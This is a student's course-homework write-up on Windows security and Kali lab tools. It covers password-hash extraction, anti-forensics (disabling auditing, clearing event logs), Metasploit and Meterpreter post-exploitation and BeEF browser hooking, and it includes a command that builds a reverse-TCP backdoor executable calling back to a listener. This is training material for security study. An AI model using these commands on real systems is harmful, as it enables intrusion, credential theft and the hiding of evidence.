1. 程式人生 > >2017-2018-2 20179226 《網絡攻防》第7周作業

2017-2018-2 20179226 《網絡攻防》第7周作業

str exp work oot 防火 記錄 tom 安全攻防 port

課程學習

1.windows操作系統內核實現的核心機制有:
1)Windows進程和線程管理機制
2)Windows內存管理機制
3)Windows文件管理機制(NTFS)
4)Windows註冊表管理機制(註冊表中的系統自啟動掛接點上註冊的應用軟件可以隨系統引導而自動運行,因此也是很多惡意代碼及流氓軟件普遍的攻擊目標)
5)Windows的網絡機制(從OSI網絡參考模型的物理層到應用層,各層上對應的Windows網絡組件模塊)
2.Windows授權與訪問控制機制
Windows的授權與訪問控制機制是基於引用監控器模型,由內核中的SRM模塊與用戶態的LSASS服務共同來實施。 在Windows服務器操作系統中,用戶可以執行內建的whoami命令來查看當前用戶的訪問令牌信息。 Windows對於系統中所有需保護的資源都抽象成對象,具體類型包括文件、目錄、註冊表鍵值、內核對象、同步對象、私有對象、管道、內存、通信接口等,而對每個對象會關聯一個SD安全描述符. 對象安全描述符由如下主要屬性組成:Owner SID、Group SID、DACL自主訪問控制列表、SACL系統審計訪問控制列表。
3.Windows 遠程安全攻防技術


Windows遠程攻防技術可以分為以下幾大類:遠程口令猜測與破解攻擊、攻擊Windows網絡服務、攻擊Windows客戶端及用戶。 Windows系統上的安全漏洞生命周期:漏洞發現與披露、滲透測試與利用攻擊、漏洞修補等。
4.Windows的其他安全機制
身份認證、授權與訪問控制以及安全審計是三個基本安全功能。 保護Windows系統安全穩定運行最為關鍵的三項安全措施——防火墻、補丁自動更新以及病毒防護。 除安全中心之外,Windows的安全特性還包括IPSec加密與驗證機制、EFS加密文件系統、Windows文件保護機制、捆綁的IE瀏覽器所提供的隱私保護與瀏覽安全保護機制等
5.Windows系統口令字密文提取技術

在本地獲取口令字密文的主要包括如下三種途徑:
1)從另一種操作系統啟動後拷貝文件系統中的口令密文文件
2)利用硬盤修復工具包中的rdisk工具,執行rdisk/s-命令創建SAM備份文件副本
3)使用pwdumpX系列工具直接從SAM文件或活動目錄中提取口令字密文
6.Windows消蹤滅跡
1)關閉審計功能(Windows Resource Kit工具包裏的auditpol程序可以讓他們輕易地關閉審計功能)
2)清理事件日誌(使用Event Viewer事件查看器來打開、讀取和清除這臺主機上的事件日誌)

視頻學習

一、KaliSecurity 漏洞利用之檢索與利用

searchsploit
searchsploit可以借助關鍵詞搜索漏洞信息以及漏洞對應的exp,命令searchsploit wordpress

列出了漏洞和文件地址。
技術分享圖片
查看列出的文件,例:
技術分享圖片

二、KaliSecurity 漏洞利用之Metasploit基礎

Metasploit在滲透測試中經常被用到。這套軟件包括了很多工具,這些工具組成了一個完整的攻擊框架。
1.啟動服務
在Kali中使用metasploit,需要先啟動Postgre SQL數據庫服務和metasploit服務,然後就可以完整的利用msf數據庫查詢exploit和記錄。

service postgresql start
service metasploit start

如果 不想每次開機都手動啟動服務,可以配置隨系統啟動 update-rc.d postgresql enable update-rc.d metasploit enable
2.路徑介紹
Kali中msf的路徑為/usr/share/metasploit-framework
Auxiliary:輔助模塊 encoders:供msfencode編碼工具使用,具體可以使用msfencode -l。
exploits:攻擊模塊,每個介紹msf的文章都會提到那個ms08_067_metapi,它就在這個目錄。
payloads:這裏面列出的是攻擊載荷,也就是攻擊成功後執行的代碼,比如我們常設置的windows/meterpreter/reverse_tcp就在這個文件夾下。
post:後滲透階段模塊,在獲得meterpreter的shell之後可以使用的攻擊代碼。比如常用的hashdump、arp_scanner就在這裏。
3.基本命令
msfpayload:用來生成payload或者shellcode。
搜索的時候可以用msfpayload -l | grep "windows"這樣的命令查詢。
-o 選項可以列出payload所需的參數
msfencode:msf中的編碼器,早期為了編碼繞過AV,現在常用msfpayload與它編碼避免exploit的壞字符串。
1)輸入msfconsole,打開msf:
技術分享圖片
2)發現漏洞,使用命令nmap -sV 192.168.1.124
技術分享圖片
技術分享圖片
3)使用set設置參數:
技術分享圖片

三、KaliSecurity 漏洞利用之Meterpreter介紹

Meterpreter是metasploit框架中的一個擴展模塊,作為溢出成功以後的攻擊載荷使用,攻擊載荷在溢出攻擊成功以後給我們返回一個控制通道。使用它作為攻擊載荷能夠獲得目標系統的一個meterpreter shell鏈接。
Meterpreter作為後滲透模塊有多種類型,並且命令由核心命令和擴展庫命令組成,極大的豐富了攻擊方式。其有很多有用的功能,如添加一個用戶、隱藏一些東西、打開shell、得到用戶密碼、上傳下載遠程主機文件、運行cmd.exe、捕捉屏幕、得到遠程控制權、捕獲按鍵信息、清楚應用程序、顯示遠程主機的系統信息、顯示遠程機器的網絡接口和IP地址等信息。
常用的命令:
background:將當前會話放置後臺
load/use:加載模塊
Interact:切換進一個信道
migrate:遷移進程
run:執行一個已有的模塊,這裏要說的是輸入run後按兩下tab,會列出所有的已有的腳本,常用的有autoroute,hashdump,arp_scanner,multi_inject等
Resource:執行一個已有的rc腳本常用的Meterpreter類型為:payload/windows/meterpreter/reverse_tcp
針對windows操作系統,反向連接shell,使用起來比較穩定。
生成Meterpreter後門;打開MSF,開啟監聽(選擇exploit/multi/handler);在目標機器上執行door.exe;

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.113 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe /* 查看自己的IP地址為192.168.8.113,LHOST、LPORT為reverse_tcp的參數,可以在msf裏查看到(記得把服務啟動)*/

四、KaliSecurity 漏洞利用之Metasploit後滲透測試

在跳板獲取一定權限後需要積極地向內網主機權限發展,獲取指定的目標信息,探查系統漏洞,借助msf已經得到的Meterpreter後門,可以使系列的操作更容易。
1.查看當前網卡、網段信息(使用ifconfig)。可查看到三個網卡,一個是本地網卡,另一個是我們能訪問的網卡,還有一個網卡具有內網IP(訪問不到,可以ping以下試試)。
2.添加路由表run autoroute -s 10.0.0.1可以使用msf中的模塊跨網段攻擊或掃描。可通過腳本autoroute快速添加。
3.開socket代理,通過使用auxiliary/server/socks4a模塊,創建一個socks代理,可以為瀏覽器,sqlmap,nmap使用。通過代理即可訪問內網計算機。
4.通過background和session -i可以自由切換進入session。
5.輸入run可以看到在meterpreter上可以做的很多命令。
6.通過run post/可以看到後滲透測試模塊
7.獲取內網信息run arp_scanner -r 10.0.0.1/24
8.也可以上傳文件,做端口轉發後進行後續測試,例如upload lcx.exe c:\\傳送文件到c盤根目錄。

五、KaliSecurity 漏洞利用之BeEF

1.輸入命令beef-xss啟動BeeF
技術分享圖片
技術分享圖片
2.使用默認用戶名beef與默認密碼beef登錄
技術分享圖片
3.HOOK持續的時間為關閉測試頁面為止,在此期間,相當於被控制了,可以發送攻擊命令,在Commands模塊,我們可以完成很多任務:
其中,4種顏色分別表示:
綠色:該攻擊模塊可用,且隱蔽性強
灰色:該攻擊模塊可用,但隱蔽性差
橙色:該用戶模塊是否可用還有待驗證
紅色:該攻擊模塊不可用
4.例如,選取MISC下的Raw JavaScript模塊作為測試用例,右端表格有該模塊的詳細說明,以及一些可用的參數等。輸入JavaScript code,點擊Excute進行攻擊。
5.Proxy功能(代理功能)
選中目標主機,點右鍵,在菜單中選中Use as Proxy;然後在Rider選項卡中的Forge Request編輯並發送想要發送的內容。
6.BeFF默認是不加載Metasploit的,如果要使用Metasploit豐富的攻擊模塊,需要做些配置。
技術分享圖片
修改/usr/share/beef-xss/config.yaml中的metasploit 一行為true
技術分享圖片
保證此處IP等信息設置正確(不適用127.0.0.1,需使用本機IP),並修改Custom路徑,配置好後,打開msfconsole,運行命令load msgrpc ServerHost=192.168.1.124 Pass=abc123

2017-2018-2 20179226 《網絡攻防》第7周作業